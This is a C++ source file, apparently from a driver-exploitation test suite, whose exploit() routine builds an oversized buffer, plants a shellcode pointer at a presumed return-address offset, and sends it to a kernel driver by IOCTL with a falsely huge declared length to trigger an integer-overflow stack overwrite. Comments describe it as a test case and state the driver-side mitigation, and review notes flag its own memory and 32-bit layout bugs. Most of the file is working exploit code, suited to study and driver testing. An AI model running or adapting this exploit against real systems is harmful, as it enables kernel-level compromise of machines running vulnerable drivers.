IntegerOverflow.cpp
#include "IntegerOverflow.h"
// Test case for the IntegerOverflow driver check: submits a buffer whose
// declared length (Declared_Input_Buffer_Size, 0xFFFFFFFF) is far larger than
// the memory actually allocated (Actual_Buffer_Size, 0xFFFF). A driver that
// trusts the caller-supplied length without checking it against the real
// allocation, or whose length arithmetic wraps, would access memory past the
// buffer. The driver-side mitigation is to validate every caller-supplied size
// against the actual allocation and to use overflow-checked arithmetic before
// any copy.
//
// Returns: the result of driver.SendIOCTL, or false if the allocation check
// below fails.
bool
ExploitIntegerOverflow::exploit() {
// 0x0BAD0B0B0 (== 0xBAD0B0B0, fits in 32 bits) is written right after the
// pointer slot below; presumably a sentinel marking the end of the controlled
// data so it is recognisable in a debugger — not verifiable from this file.
static const size_t Buffer_End_Magic_Marker = 0x0BAD0B0B0;
// Number of bytes actually allocated for the buffer.
static const size_t Actual_Buffer_Size = 0x0000FFFF;
// Length reported to the driver; deliberately exceeds Actual_Buffer_Size.
static const size_t Declared_Input_Buffer_Size = 0xFFFFFFFF;
// NOTE(review): an array allocated with new UCHAR[] is handed to
// shared_ptr<UCHAR>, whose default deleter calls delete rather than delete[] —
// undefined behaviour on release. shared_ptr<UCHAR[]> (C++17) or std::vector<UCHAR>
// would own the array correctly.
shared_ptr<UCHAR> buffer = shared_ptr<UCHAR>(new UCHAR[Actual_Buffer_Size]);
// NOTE(review): plain new throws std::bad_alloc on failure instead of
// returning nullptr, so this branch is effectively unreachable unless a
// nothrow allocator is in use.
if(!buffer) {
wcerr << L"[!] Could not allocate buffer of size: 0x"
<< hex << setw(8) << setfill(L'0') << Actual_Buffer_Size << endl;
return false;
}
// Fill the whole allocation with a single recognisable byte value.
memset(buffer.get(), 'A', Actual_Buffer_Size);
// Offset inside the buffer at which the pointer-sized value is placed. The
// name suggests it lines up with a saved return address in the driver's stack
// frame for a particular build; that cannot be confirmed from this file.
static const size_t Return_Address_Overwrite_Index = 0x828;
// Project helper; its return type (deduced via auto) and the meaning of the
// arguments (8, true) are not visible here — it is dereferenced once below, so
// it returns a pointer to something assignable to void*.
auto shellcodePtr = adjustPayloadEpilogue(8, true);
// A void*-sized value at the index, then the size_t marker 4 bytes later.
// NOTE(review): this layout assumes sizeof(void*) == sizeof(size_t) == 4, i.e.
// a 32-bit build; on a 64-bit build the two writes would overlap.
*(reinterpret_cast<void **>(&buffer.get()[Return_Address_Overwrite_Index])) = *shellcodePtr;
*(reinterpret_cast<size_t*>(&buffer.get()[Return_Address_Overwrite_Index + 4])) = \
Buffer_End_Magic_Marker;
// Submit the buffer to the driver with the oversized declared length; the
// IOCTL code is the class constant Ioctl_Code (defined in the header).
bool ret = driver.SendIOCTL (
ExploitIntegerOverflow::Ioctl_Code,
buffer.get(),
Declared_Input_Buffer_Size
);
return ret;
}